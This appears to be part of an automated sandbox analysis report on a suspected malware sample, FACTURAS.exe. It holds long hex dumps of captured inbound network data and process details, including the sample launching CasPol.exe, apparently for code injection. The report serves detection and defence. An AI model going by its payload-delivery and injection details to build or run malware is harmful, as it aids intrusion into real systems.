2021-12-14 12:42:36 UTC	199	IN	Data Raw: 73 3f af a0 c1 02 4b ed 24 3d 46 3a 3d fd be dd 64 66 f8 24 ae de d9 f1 5d 63 f4 df bc 5e b3 69 80 32 1f ae c2 53 e7 a9 d6 79 1e 9b 24 ff cc 01 06 74 a8 c2 cc ea 4f 4f 4b 04 19 8a 64 10 4f f2 18 96 48 c0 62 19 a0 03 ae cf d4 44 e5 b1 a7 80 ec 49 53 c7 26 6a b5 43 a8 d7 e9 d8 a4 86 fc 8a 11 08 17 9b 28 b4 4a 10 f6 d7 36 3a 9e a3 f9 a2 c8 58 dc a6 3a 99 5f 15 4d 45 05 9c 7f 91 12 fe 56 c5 8f 59 d9 b7 07 0a 2b fb c1 61 65 18 26 20 06 c6 ea 87 bb 83 ac 9b 29 08 39 45 21 d1 31 2e 11 4c 51 58 7e 99 0b 4f 00 34 ee 6d d7 34 4d 49 f9 3a 01 f9 e2 75 3f 00 66 86 2a 63 26 54 1c f4 6f 75 35 bd 1d 8b d5 30 8e 27 0f 4b 75 f2 b8 b3 fb 9b 03 65 9b 61 1f 42 ad c7 17 60 20 ac 86 68 2b 3f 42 78 94 83 80 ba 06 1b 81 ab ad 32 ea 3d 60 17 b9 88 66 f6 86 14 1f 85 40 10 89 43 6f Data Ascii: s?K$=F:=df$]c^i2Sy$tOOKdOHbDIS&jC(J6:X:_MEVY+ae& )9E!1.LQX~O4m4MI:u?f*c&Tou50'KueaB` h+?Bx2=`f@Co
2021-12-14 12:42:36 UTC	200	IN	Data Raw: 16 b5 40 bf 1d 4f d3 ab b7 9f c8 5a 7e a4 fc c5 69 34 a5 a4 f5 20 fe 60 3b d2 6f 93 3e fc 18 02 59 e0 8f 63 e0 7a f7 41 53 19 9d c2 68 0f a4 6a 2a 57 48 58 de 4a 86 b4 66 03 71 f4 51 e5 c8 31 72 d5 da 76 9c 4a bd 83 73 5c e6 4f 9f 00 bc a5 c7 20 0f 44 02 85 b7 8e ba d0 59 75 dd 9c 0b 7e 4b fb 3d 06 61 f7 36 53 ef 9a 75 8c 64 e4 8b 1d 05 61 ca 91 c8 12 ae d8 cc 54 5b 09 84 24 b8 bc f6 4d d2 8e e1 69 f6 9a 13 dc 5a 91 75 26 ad fd 24 72 16 06 47 c0 16 93 65 87 5a ea de 19 4c d7 51 c8 19 45 a2 93 59 c3 ae ab 4f 3c 0a 69 0a 71 8d 4c ad 13 b6 bd 18 69 b6 4e 7b 96 23 ee 60 f5 22 01 d2 b7 14 b5 1d 6a 8c 12 70 58 06 55 2e 86 c9 f9 6c 3a 36 f7 5d aa d7 1f b3 de 42 77 42 3a 02 3d f4 e6 4b 09 55 d8 80 1c 33 46 57 50 0e b8 9d 2f 01 70 45 c3 a8 52 a4 48 68 93 b1 fe d3 Data Ascii: @OZ~i4 `;o>YczAShj*WHXJfqQ1rvJs\O DYu~K=a6SudaT[$MiZu&$rGeZLQEYO<iqLiN{#`"jpXU.l:6]BwB:=KU3FWP/pERHh
2021-12-14 12:42:36 UTC	202	IN	Data Raw: fd 4a 55 72 34 43 f6 54 70 24 e8 13 e9 87 bd 8a a2 52 36 cb 82 c9 3a 5e 9d 12 44 76 26 39 fe f7 e0 5d 73 88 32 cb fc e7 d4 5b 44 cf c2 b5 73 c7 57 98 40 05 a5 d1 58 cd bc d0 0c 3f 97 33 f3 ee 1a 1d 79 97 d3 cc f2 20 5f 41 1c 12 b6 7a 14 2d dc 14 ab 5f f8 0d 0f b4 73 88 a2 b3 65 fc ee 83 9b 8d 7b 5f b5 35 7e c5 6e c5 a4 ca c5 97 82 d9 9f 17 0c 04 a2 51 a3 4a 64 ee f0 23 1d 82 80 e8 d0 fe 56 d2 cd 18 88 7f 3e 58 53 75 80 74 96 28 ee 4d d9 9e 5d da c3 17 16 3d f2 a0 53 69 27 37 01 0b c6 f5 e2 dc a5 b7 a9 1c 07 2f 6f 47 d2 31 2e 20 42 6f 2c 4f 9e 11 4b 01 29 d8 19 c2 34 58 7b b0 13 12 ec c2 79 2f 1b 77 b6 2b 5c 26 53 0b f0 02 12 1d ac 2f a7 d2 3b af 36 13 5a 57 ea d4 a0 eb 9d 39 29 88 61 1d 57 b5 b5 15 05 15 83 a1 54 23 2e 42 61 fd 8b 8b 8c 38 38 85 d9 82 3e Data Ascii: JUr4CTp$R6:^Dv&9]s2[DsW@X?3y _Az-_se{_5~nQJd#V>XSut(M]=Si'7/oG1. Bo,OK)4X{y/w+\&S/;6ZW9)aWT#.Ba88>
2021-12-14 12:42:36 UTC	203	IN	Data Raw: 21 fd 19 2d d9 2d 1a 58 db 01 58 e3 db 32 ef 95 4c 26 b3 70 a1 0d 45 cc 96 b0 ef c1 55 1d 83 e2 a6 6f 22 d1 a9 fc 4e 9b 47 49 d3 7c fe 3c f4 6c 0f 4b 94 83 62 b2 5f fe 26 73 3b e5 e7 6a 7f 97 64 45 71 2f 19 cd 4a f3 bb 64 6d 66 dd 24 ed c3 74 6d d3 cb 59 a2 53 b7 8a 73 73 ef 39 99 0b d5 92 f1 23 1e 53 0e df 8a 89 a6 f0 40 72 d1 82 18 17 57 f0 49 0a 5e f5 39 52 f2 b1 6a ef 4f f1 88 38 0b 7b af 92 d3 1b bf dc c7 5d 2f 19 a8 01 e5 89 ec 47 d2 84 88 60 f4 ee 0b fd 4b a7 78 37 ab e9 39 75 1e 68 14 ca 00 93 5f ae 11 dd cf 0a 52 ce 4b c6 58 62 cf 95 5b de 9f 9f 3b 1b 0c 73 14 77 89 4c ab 57 eb 9e 18 72 b0 4e 1c c5 0e f2 56 f1 3c 4a b6 f6 29 b5 06 6e 87 5b 33 72 1b 45 3b 84 cd d4 63 2b 33 e1 51 bd dd 04 a0 b7 78 77 27 0c 0f 2a ed f1 60 06 21 ea a7 1a 28 41 5e 74 Data Ascii: !--XX2L&pEUo"NGI\|<lKb_&s;jdEq/Jdmf$tmYSss9#S@rWI^9RjO8{]/G`Kx79uh_RKXb[;swLWrNV<J)n[3rE;c+3Qxw'*`!(A^t
2021-12-14 12:42:36 UTC	204	IN	Data Raw: e1 03 80 ce c7 d0 18 7c 92 9d 0b fd 1f 41 97 66 2d fb 41 4e 6d 7f 55 9a 7b 1f 28 ef 08 e4 9e a6 ca a7 52 19 a4 a4 d0 37 40 f8 0e 5f 6f 37 3f e7 9e ca 55 7e fc 24 dc 88 ec f2 6f 63 ce c3 be 52 d0 6a 95 32 17 ad c0 73 fb ab b3 3c 23 9d 28 ee db 1a 22 6c 8a d1 ce fb 54 49 56 68 08 9d 60 10 3d b0 33 91 58 d7 62 23 af 16 b9 bb d6 53 91 ac af 98 ec 4f 4b f3 1d 61 a8 47 dc d0 e9 de fb 80 ef 9f 3a 2a 0a a2 21 b1 5b 75 c3 b2 11 0b 95 a5 f9 d0 d8 58 d2 bd 2a 99 6e 1e 3d 47 60 9b 45 a1 23 ce 6b ce 88 53 db b5 36 01 5b ed a4 53 53 30 2d 00 3c c2 eb 8d d7 b6 a6 84 59 3a 2e 54 62 ed 2c 2c 27 4c 63 5e 68 ba 01 5e 02 23 f9 6d e4 3e 75 79 c7 31 05 98 f6 6e 5e 09 60 c5 1c 67 20 21 2a f8 1d 12 16 a5 2d a7 d2 42 bf 30 04 5e 42 e2 84 b5 e1 83 03 06 ac 45 1d 44 b7 c7 72 23 0d Data Ascii: \|Af-ANmU{(R7@_o7?U~$ocRj2s<#("lTIVh`=3Xb#SOKaG:![uXn=G`E#kS6[SS0-<Y:.Tb,,'Lc^h^#m>uy1n^`g !*-B0^BEDr#
2021-12-14 12:42:36 UTC	205	IN	Data Raw: fb 81 d9 54 a5 c6 a3 66 04 22 f5 c3 73 06 1d ed 46 39 f1 34 1d dd 34 08 1d f0 1b 4e e7 ca 36 ae ac 25 0b a5 66 a6 0a 04 ed 8b a3 f2 da 3c 3a a8 e9 c5 49 3d cb b4 f2 49 f5 75 3b f7 66 fd 2f ff 6a 33 57 8f a2 77 e0 6d e9 32 62 1b f0 aa 5b 6a 9b 79 04 4d 4a 3f ca 41 e7 a4 44 7b 62 e1 34 f2 dc 58 7a de dd 29 b1 5f ac bb 3a 54 e2 23 8d 03 d9 bf d0 14 17 4e 0d ca 8f a9 b8 d0 4a 70 c0 9b 03 10 4b 9e 3a 3c 45 c9 1b 59 e5 98 67 e8 4f c8 92 16 08 7a cd b2 cd 33 ba d4 d0 52 2f 35 bf 0c f3 f9 cb 57 ce 9e ed 6a bf d9 3b d5 42 b1 78 31 ab f6 23 6f 71 75 71 cd 3a aa 61 92 1d c3 d9 15 7a cb 4b c0 5a 6d bb 9b 5d f8 a5 a8 26 08 1d 65 13 5a 83 51 bb 25 d1 9a 1e 72 b1 47 4f e6 1b e8 56 db 21 10 8d ec 29 b2 6f 51 87 12 15 65 3a 46 3b 9f c3 d3 7e 4e 30 c1 5d 87 f9 03 bb ab 67 Data Ascii: Tf"sF944N6%f<:I=Iu;f/j3Wwm2b[jyMJ?AD{b4Xz)_:T#NJpK:<EYgOz3R/5Wj;Bx1#oquq:azKZm]&eZQ%rGOV!)oQe:F;~N0]g
2021-12-14 12:42:36 UTC	207	IN	Data Raw: 4c 29 4e ae fe ef b0 31 b7 16 c4 f6 f0 4f 76 73 ae 86 30 95 e4 e9 d6 34 67 8e 8b 1c ab 0d 51 8f 4d 6f df 4f 4c 72 6e 68 ea 5d 1e 10 ea 14 fc 83 c9 c3 a3 4a 05 8f ac c6 37 47 f1 35 3d 4c 13 2f ea b7 db 62 7a fb 34 c2 fc b8 d0 5b 61 e2 c9 b4 69 d6 49 81 2c 02 c0 d6 62 ea 86 e6 0a 28 8c 06 ed db 06 06 0d af d5 c1 dd 4c 45 41 06 39 f3 47 18 3b c0 32 94 45 f1 63 39 d9 20 b2 bc c7 44 fc c0 8b 97 e3 5c 55 d0 1f 76 ab 52 a8 fc e1 c0 be 8b ef 86 00 07 11 cf 10 b0 5b 71 d2 da 2f 0b 89 a7 9c e7 f5 41 d6 bf 30 83 66 09 53 54 05 b7 77 89 09 d2 5a de 96 59 d9 b7 53 14 3e ea 9e 77 6d 06 26 1d 1a a7 df 87 cf 90 a2 84 3c 07 3f 20 46 e4 31 03 06 56 70 5e 69 82 1c 3b 3c 16 ce 03 d4 01 56 7f de 20 77 ff f5 68 01 22 7d a6 3e 63 17 4f 0a c1 00 7b 3e bd 42 af c5 36 a3 01 0e 4a Data Ascii: L)N1Ovs04gQMoOLrnh]J7G5=L/bz4[aiI,b(LEA9G;2Ec9 D\UvR[q/A0fSTwZYS>wm&<? F1Vp^i;<V wh"}>cO{>B6J
2021-12-14 12:42:36 UTC	208	IN	Data Raw: 19 3a 9b 27 7b 3e 93 1c 57 81 6d 46 57 70 0f b7 84 ca 92 cd 57 d1 d9 af 63 07 24 c4 e6 63 12 78 dd 64 3f ed 0d 1d fc 3c 08 69 d1 0d 44 d8 ca 22 80 a9 29 02 a8 7a a5 0b 53 e0 81 a8 9f cf 45 7e a1 e3 c5 59 2b d6 b4 f6 4d b5 55 5e d7 7c e1 30 ee 61 6e 7d 92 b5 74 94 51 f7 33 77 0e f5 fd 0f 68 86 79 75 5e 5c 2b da 40 e4 ba 78 03 55 f6 25 c4 d7 54 76 c5 da 40 b8 5d 99 97 00 5f ec 2d 94 1e bc 91 db 27 24 60 0b cf 91 83 bb c6 7e 70 d9 9b 00 07 38 d3 3c 35 45 ff 22 5b ff f4 53 e2 53 81 be 3d 0b 76 c4 90 ce 0c b3 b1 f1 4a 28 28 b5 0f ae ab ed 40 c9 83 e5 62 bf c9 31 cb 47 b5 77 2c b8 f8 39 75 1e 68 3a ff 0a 95 6d 8b 00 da c9 0a 48 90 7d c6 59 6d bd 8b 3e cd a5 b8 10 2e 17 72 06 5f bc 57 b1 56 eb 8d 0d 77 92 45 71 f9 05 f8 22 d7 23 01 85 f7 22 85 06 71 87 16 04 72 Data Ascii: :'{>WmFWpWc$cxd?<iD")zSE~Y+MU^\|0an}tQ3whyu^\+@xU%Tv@]_-'$`~p8<5E"[SS=vJ((@b1Gw,9uh:mH}Ym>.r_WVwEq"#"qr
2021-12-14 12:42:36 UTC	209	IN	Data Raw: 1c c9 7f ae 17 91 b9 a7 3b e1 1d ad 99 eb 0a 5f 51 0d 30 30 a6 82 f2 f5 35 c3 67 87 99 83 0b 1f 6f de 86 66 e6 e8 81 a2 76 05 ef fd 79 ff 62 2a ed 3a 6f 89 20 3f 1e 19 29 94 36 7e 43 ab 63 91 eb d1 a2 e6 3f 5b d9 49 25 52 12 9c 40 30 03 52 5f 9b d7 b6 32 1b 88 40 ac 86 be 9d 29 14 20 37 c2 3e b3 3a e9 52 13 c5 85 07 8c 59 2e 7c 4d ff 46 98 d7 6c 72 0c f9 be a5 9e 23 2d 2a 66 4f f4 14 77 4e be 60 78 89 97 0b 5f b4 75 eb cd a1 4c 9f ec c3 d6 8f 3c 3c a9 76 13 c4 2e a6 a2 8b af e7 ea 9b cf 61 69 64 c1 58 c1 2f 10 a3 32 83 6b c7 d3 8e 22 5e 33 bf cc 52 e3 08 6c 3d 3c 15 e8 1c eb 5f 3d f4 b9 7b ed a5 43 86 61 db 47 cf 21 0c 75 51 f3 b3 a9 9d e2 bb d2 43 13 5f 49 4a 21 33 01 a0 58 65 22 03 24 09 cc 68 29 f5 97 8e 4d b0 43 b9 c3 b6 74 76 99 82 9c 8b 7d 15 cd 4d Data Ascii: ;_Q005gofvyb:o ?)6~Cc?[I%R@0R_2@) 7>:RY.\|MFlr#-fOwN`x_uL<<v.aidX/2k"^3Rl=<_={CaG!uQC_IJ!3Xe"$h)MCtv}M
2021-12-14 12:42:36 UTC	210	IN	Data Raw: f2 f0 49 ee 25 37 ac ca 01 d2 3b 1d ed d4 fa 94 6c 0c 5a 6e ec b8 3e 12 39 99 01 39 0c 60 cb 26 15 22 90 7d 0d 3a 41 d5 ae e3 7b cf 1a 42 07 f9 e3 ba 9f 1e 41 82 71 f2 57 b8 e2 62 b1 e8 f6 c0 99 fb d0 9a ac 4b 6c a6 64 e0 cf c5 3e c6 b0 9f ae 1b 61 95 c4 fa 59 de 9b 26 3e 71 5a c0 b4 55 44 10 60 57 55 a0 3b 50 a9 0d 73 bd db 8c 98 a5 7f c9 b6 3a 88 78 d3 71 04 2b a4 6b 39 0a ed dc 83 6b 47 7d 29 57 ce 98 d6 a5 7f 1c c6 06 a1 70 9e c6 80 54 fe 12 b8 fb eb ea cc 22 9f 8c 30 ae 8c ef e5 51 c3 67 8c 80 85 06 12 06 cf 94 e7 79 90 9b a2 6b 17 fd e5 65 e0 70 39 ff 24 6d 97 2e 31 16 1a 24 86 24 6d 5a 96 6f 96 f7 ca a6 da 22 58 cc dc b2 d7 a3 9c 5f 3d 02 47 4e 12 54 b9 2e 1f 8d 61 af 9b b8 95 2e 06 a3 ba d0 27 b1 3e f4 41 74 dc a3 17 9f d8 ad 79 51 f8 67 88 bf 60 Data Ascii: I%7;lZn>99`&"}:A{BAqWbKld>aY&>qZUD`WU;Ps:xq+k9kG})WpT"0Qgykep9$m.1$$mZo"X_=GNT.a.'>AtyQg`
2021-12-14 12:42:36 UTC	211	IN	Data Raw: eb 01 5f 59 2b 08 f9 6c ee f8 73 6f ec b6 e6 41 05 45 32 70 ce e8 17 eb d7 f9 52 f4 20 6e f8 2c 20 cd 76 02 03 ed c1 53 47 6b 0f d0 16 36 c8 c7 d7 a1 dc 88 95 34 0f 32 4e f1 9e 92 f2 ec 8a b9 43 e8 76 e7 25 c9 7c a5 d6 e3 0a 73 98 27 2d 84 b2 41 c5 b3 b1 8c 60 5e 12 42 cd 3b 84 ed 76 13 45 58 41 bd d7 05 a4 ff 10 d6 f8 ef 81 a9 98 06 d8 93 f0 ee e1 b6 e3 64 f2 5a d2 73 23 d9 49 ab 74 14 a6 ff 77 0b 4a 81 99 ad 6d 44 e4 bf c9 78 dd cd ad 5b 25 41 e1 cb c8 3f 62 5e 52 5d fe 3b 2a 64 fb 68 34 f5 06 3b 12 12 71 b4 db 8c fd b1 2f ad 90 c0 0e 6d 4b b5 b0 03 33 7f b5 32 5f 16 74 6b b6 57 6e 0f 21 6b 3f 9d a1 53 88 e6 49 78 c4 07 cc 7c 22 a3 f9 d4 83 b5 2e fc e7 92 d8 0f 4f a0 dd 96 28 93 1b 3e a6 8b 86 44 9f 16 5d 3b f2 4e 09 f2 bc 9d 5c 13 63 98 99 0a 12 e6 03 Data Ascii: _Y+lsoAE2pR n, vSGk642NCv%\|s'-A`^B;vEXAdZs#ItwJmDx[%A?b^R];*dh4;q/mK32_tkWn!k?SIx\|".O(>D];N\c
2021-12-14 12:42:36 UTC	213	IN	Data Raw: 35 cb fc 54 9c 9b 1d ea 80 a5 d5 48 40 27 2b b5 93 f5 f5 5b 7d 9d 1f b0 4d 34 d8 3f 01 ff d7 f0 96 68 0d 46 79 6d 8d 36 94 46 89 33 ba 18 67 cb 22 1c 29 90 6e 12 b5 76 dd b1 69 cf ed 14 5e 8e e5 e8 b1 bd 02 48 8c f7 5f 54 a5 fe 75 b7 ee f1 bb 18 51 d3 9a a6 60 4d a4 7f e3 4a 7d 20 c7 31 0d b3 0e 1d 98 5b 57 46 cc 88 2c 24 6f 58 41 86 5b d8 e6 4f 5e 42 b2 33 4c 36 16 44 ae d7 86 96 b9 7b db a9 2f 91 e6 7e 61 3f 2b b1 6a 2a 0d f7 cb b8 78 4b 6d 50 4a c8 9f ca b4 4b 1c d5 14 ae 79 86 c1 a7 d7 65 19 b1 e5 f7 79 cf 85 0d 30 30 46 2b e9 c7 51 cc e0 3b 97 87 2a 0e 08 58 3b 60 d4 90 97 20 b6 03 e4 f8 78 e0 62 2a ec 3e 69 9c 3c b8 87 1b 29 87 36 7e 4e 96 6f 98 da ce b4 d3 2c db 52 c8 b2 d7 72 88 53 bc 9c 53 52 86 cb 39 a9 1e 9a c0 ee 86 b6 93 3a 86 00 a8 de 52 bb Data Ascii: 5TH@'+[}M4?hFym6F3g")nvi^H_TuQ`MJ} 1[WF,$oXA[O^B3L6D{/~a?+jxKmPJKyey00F+Q;X;` xb*>i<)6~No,RrSSR9:R
2021-12-14 12:42:36 UTC	214	IN	Data Raw: 92 c5 45 3f eb 68 77 59 40 64 16 d8 a0 60 e3 60 de e5 04 51 5d 2a 19 ef 6f ef fa 69 7a 65 eb e8 73 87 4d 3e f6 d6 ef 16 82 d6 7a 7a fc 34 f0 f8 28 0e de f6 53 85 e0 c7 60 47 7e 19 58 29 2e ed db d7 a1 c8 9c a7 5e 0f 32 4e e8 8b 86 e3 ee 87 84 44 e7 f1 cf 3d c4 70 22 eb e0 0f 08 9d 3b 34 9b af 5d d8 b8 be 8f 5d 59 0e 49 d8 36 82 e8 70 10 5c 44 7c b6 ca 18 a4 f4 03 c3 ca e5 90 2d 19 01 de 93 f2 e8 f4 87 f9 79 fa 4d 4e ef 2c d7 d4 f6 64 14 a5 73 64 9b da dc 94 ac 7f 57 f0 bf ce 74 c9 4f a8 67 2c 52 f2 d4 d6 3e 75 d9 12 4d 8b 2f 25 52 e0 74 2b f4 1e 29 01 17 71 b7 c4 9b 62 0d 29 ab b8 c5 02 7d 44 31 34 07 79 f9 df 32 5f 15 e4 68 aa d8 3b 15 bf 6c 21 9d a1 49 02 fe 42 77 40 49 d9 71 38 c2 f6 50 3e a1 34 75 c6 9c cb 04 5c ab c8 9b 31 19 4b 33 b4 0a 9b 57 94 09 Data Ascii: E?hwY@d``Q]*oizesM>zz4(S`G~X).^2ND=p";4]]YI6p\D\|-yMN,dsdWtOg,R>uM/%Rt+)qb)}D14y2_h;l!IBw@Iq8P>4u\1K3W
2021-12-14 12:42:36 UTC	215	IN	Data Raw: b7 0f e4 c5 b5 05 46 4a aa 34 c4 a3 6d c9 dc 1f 04 3b 5b e0 1c 91 92 8e cd 20 ab 52 28 4c 0f 3d 36 00 ed 72 ad 7e 9c d3 b3 4f 34 cf 3d 15 f3 d8 e3 9c 70 05 5b 63 f1 b0 31 9b 44 94 29 25 19 6d d8 24 1a 2f 8c 1a 14 b3 70 d5 a8 ee 7e ed 18 5e 88 d1 e1 a8 88 10 dc 07 74 e0 d7 f6 f0 68 a3 fb 65 30 9b ee 50 d4 a6 65 63 b9 64 fa d5 c9 2a c9 34 03 b7 01 1a 08 99 f4 2d ca 8e 2e 24 65 44 ce bd 47 50 0c 5d 51 53 bb 2a 42 a6 9d 73 ae c4 8d 85 a1 68 d0 b5 b8 05 79 ca 7e 34 37 3b 6a 39 01 e2 a7 b1 76 47 63 24 52 db 9c db b0 42 1c d3 07 bf 6c 01 55 bb 4b f9 0a 3c c1 eb 02 48 10 1f 4b a1 fe 80 cf e2 58 c3 67 8a 91 9f 09 06 1f fa 87 67 e9 92 81 a5 75 17 e9 fc 79 fc 70 2a cc 3e 65 9c 3c b8 87 1b 35 1b 78 62 22 85 74 82 76 50 a5 d4 bf 1a c5 c7 b2 d7 72 93 54 2c 87 e3 5e 9d Data Ascii: FJ4m;[ R(L=6r~O4=p[c1D)%m$/p~^the0Pecd4-.$eDGP]QSBshy~47;j9vGc$RBlUK<HKXgguyp*>e<5xb"tvPrT,^
2021-12-14 12:42:36 UTC	216	IN	Data Raw: 50 29 60 80 ec 6f 52 cf 48 cd a7 43 ed c3 48 30 16 81 d5 c9 80 f8 e7 4c c9 81 56 27 59 8c 78 64 66 de fc 0c 41 74 23 06 f9 ea ff 78 ff 6c e1 ab e3 53 83 5e 2f 75 d3 e9 02 82 c5 7b 77 06 26 73 fd 2e 06 dd f7 8f 85 80 c7 73 46 6e 1e 50 27 33 ec c7 c1 23 e9 84 b5 27 12 37 57 fb 96 9a fe e8 7e a4 46 f5 77 fa 2f c1 6d 23 e7 17 09 15 9a 21 2e 85 b4 4a c0 bc ab 98 fd f7 0a 41 d8 22 0c 40 70 16 44 5e 41 b0 df 00 99 fb 16 d9 f2 eb 9a 2b 0e 0c d8 92 ea e5 f4 bb f6 69 ea 7f cd 7c 25 cd 51 96 70 04 2e ed 62 8c 50 97 92 b8 79 5c d8 a0 c0 72 d3 db af 6b 2f 48 f4 d5 c0 2a 6d 44 58 43 ea 20 29 d2 7c 60 3e e0 0b 31 3c 14 77 bc cd 89 e2 a5 a4 24 81 41 92 79 d5 31 ab 06 6a 70 8e a4 cc 90 7b 78 3b d8 72 1d a1 6a 2c 10 2e 4a 03 7a 4a 65 c0 02 c0 fa ab af e4 d0 94 b5 37 7e c4 Data Ascii: P)`oRHCH0LV'YxdfAt#xlS^/u{w&s.sFnP'3#'7W~Fw/m#!.JA"@pD^A+i\|%Qp.bPy\rk/H*mDXC )\|`>1<w$Ay1jp{x;rj,.JzJe7~
2021-12-14 12:42:36 UTC	218	IN	Data Raw: f7 54 30 14 b5 6c e1 83 47 d3 ef e7 e5 75 72 0f f5 d2 41 f8 a5 ba 0e 5c d7 40 3b 58 5a 79 de de 14 0b a7 ad 73 dc 51 8d 0d 67 26 bc c2 e8 b8 3d b9 d3 1c 7c 27 4a ef f8 22 ab cc 03 c2 ba e5 f3 c7 7e 6d 65 0a 44 79 6c 5c 3e 13 a8 90 21 3b 03 e5 21 3e 92 f2 8f f3 e5 b9 70 cf a2 f9 fe 03 08 d0 77 f3 c6 be 8f 82 b1 8f f5 1a 58 b8 f0 60 b1 eb f6 29 76 f4 c1 b4 ad 79 ed 48 7b 72 20 c2 30 54 e4 0f 33 30 06 81 de e4 56 42 6a 36 a3 81 58 c7 bf 54 56 0c 5d 57 55 b2 28 50 b7 17 5b ae d1 95 96 ad 55 d1 a6 2b 00 8c c1 6d 3f 2d be 71 2d 0d f8 c4 be 7e 6d 78 2b 5f d3 8b 4b 2e 4b 00 5b f6 a9 6c 02 4d b4 44 7c f4 b8 f2 f0 79 cc 45 1d 5e 25 cd 83 e6 e0 59 cf e3 bb 90 90 8a e2 1c da 84 61 e9 94 8d a8 57 0b f4 ea f8 64 6d 36 63 d5 63 8e 29 3b 10 18 3b 87 24 6d 5a 96 63 97 f7 Data Ascii: T0lGurA\@;XZysQg&=\|'J"~meDyl\>!;!>pwX`)vyH{r 0T30VBj6XTV]WU(P[U+m?-q-~mx+_K.K[lMD\|yE^%YaWdm6cc);;$mZc
2021-12-14 12:42:36 UTC	219	IN	Data Raw: 7f 31 59 3f 11 b2 45 f6 9c 98 19 7e 6e 03 44 5b 09 72 20 6f 80 ee 16 5b ce 40 dd b2 c3 65 43 73 be 3e 8f de e7 8e fc 74 e4 41 01 7d b7 d0 be 52 61 60 c9 e4 85 db 5d 31 8d f5 cf e9 f7 75 e9 79 a5 f1 d2 1a 5d 2a 70 c1 6c 0d 93 44 7f 7b f4 20 7b e0 2f 08 d1 72 06 90 41 62 72 54 eb 16 55 07 31 fa 46 58 2d f5 87 95 35 00 b6 ce fc 9e 92 eb fd 0f 01 47 e7 f2 f2 25 e9 6d 36 66 e3 03 3d 98 32 3b 06 2b 40 d7 3b be 8d 7b 49 8d 7a ce 13 88 e9 64 93 7d 4b 4c a5 d2 0c b3 fd 18 d9 e2 e9 8d 2c 0c 0c d8 8d fd e1 f4 b9 ee 60 ed 41 cf 66 33 c5 4b b6 77 26 26 f7 60 81 55 90 e9 b0 19 59 99 a2 fe 7a ea ce 9a 7b 32 48 f2 d5 cf 3f 62 44 4e 57 ea 3a 24 4c e1 75 34 e0 0b 29 01 09 7e b3 c6 88 e5 a8 22 85 91 df 16 6a 46 b7 a5 1a 76 7d 82 3b 50 88 60 75 a5 45 66 18 ab 66 3b 81 2b 5a Data Ascii: 1Y?E~nD[r o[@eCs>tA}Ra`]1uy]*plD{ {/rAbrTU1FX-5G%m6f=2;+@;{Izd}KL,`Af3Kw&&`UYz{2H?bDNW:$Lu4)~"jFv};P`uEff;+Z
2021-12-14 12:42:36 UTC	220	IN	Data Raw: 7a 78 06 67 33 ec 3f c8 25 82 ee 6c 1b df 20 1c 96 77 81 22 94 51 64 e4 83 47 c1 6f 03 e2 75 70 1d 75 36 4f f6 ac bd 0d 4e 57 a4 29 d8 be 71 d4 de 17 19 27 49 61 5c 84 83 0f 68 21 b9 d3 68 41 2f 39 37 0e fc f2 58 6f 1c 2a a2 cc 01 d0 3a 01 fd d6 fe 94 6d 0d 46 6b ec b8 2c 93 4c 9c 21 38 11 65 c5 2c 12 27 9e 73 1c bb 78 c8 a0 eb 7e ef 1a 50 86 f8 e6 ba 9d 02 5d 9e 75 f2 56 b6 fe 66 b6 e9 e4 a9 9a fc d1 94 a8 6b 6d a4 6a f2 c8 cc 22 d4 31 1e b2 09 08 89 d9 e6 44 c2 86 24 23 6d 4a c0 b3 49 58 02 55 59 48 bc 26 5e b4 1f 46 a0 d9 88 98 a4 75 d5 a7 3a 80 66 cf 73 31 25 b9 57 24 04 70 d6 b6 76 45 47 39 57 46 99 ca b7 4a 12 db 1a bc 7e 83 d4 b5 56 fc 19 bf f9 f9 6b 4d 60 1f 59 a2 c7 8a ef e7 50 de 62 82 99 82 0a 0e 1a da 87 66 f5 91 85 a2 1f 0b e1 78 79 fd 6c 24 Data Ascii: zxg3?%l w"QdGoupu6ONW)q'Ia\h!hA/97Xo*:mFk,L!8e,'sx~P]uVfkmj"1D$#mJIXUYH&^Fu:fs1%W$pvEG9WFJ~VkM`YPbfxyl$
2021-12-14 12:42:36 UTC	221	IN	Data Raw: 22 4c 44 e6 20 2f 65 5b 6f 40 62 9f 55 19 00 34 e5 57 c3 32 51 73 dd 35 04 b5 fd 75 3d 1c 7d b6 30 69 26 0c 0d fe 02 28 31 ba 2f e6 d6 71 de 7c 6c 35 16 a7 f4 e7 ae c9 46 45 e4 72 0a 47 ad d0 01 14 04 b8 b3 7c 27 3f 56 78 94 83 80 b4 02 1e 81 c7 c3 3f e2 2e 4a 19 ee cf 64 f1 8c 15 05 86 4e 16 8f 08 20 b9 1e 52 e2 a3 a2 00 35 57 3c 34 46 5f 9b a2 e7 0c d7 8d bf 17 32 17 73 d4 b6 a6 d1 9e eb d5 33 90 00 8e 45 a5 3d 55 8e 91 60 79 fd 40 4c f4 8c 4c cf 9a 96 a9 5d 67 20 34 a0 50 f9 9a 1f 65 39 68 44 b2 f7 24 85 d5 6a a3 8a 9f e4 60 6a 62 bf b0 fa ea c0 9c 9f 12 9c 3a a2 14 41 bc 6b bb 7b 06 24 ea 65 89 5b 9c 9a b0 71 59 f8 a2 cb 7a db ce a8 7b 24 4f fc c8 ca 22 67 58 52 5f e2 27 38 51 fd 68 36 e8 03 35 1c 15 76 b7 c6 89 e0 b4 27 a5 90 c2 13 68 56 b0 ad 06 6b Data Ascii: "LD /e[o@bU4W2Qs5u=}0i&(1/q\|l5FErG\|'?Vx?.JdN R5W<4F_2s3E=U`y@LL]g 4Pe9hD$j`jb:Ak{$e[qYz{$O"gXR_'8Qh65v'hVk

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: FACTURAS.exe PID: 6316 Parent PID: 2636

General

Start time:	13:41:51
Start date:	14/12/2021
Path:	C:\Users\user\Desktop\FACTURAS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0x400000
File size:	147456 bytes
MD5 hash:	2332FDDE9344114749DB5496EEF5F5F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: CasPol.exe PID: 5172 Parent PID: 6316

General

Start time:	13:42:11
Start date:	14/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0x1d0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
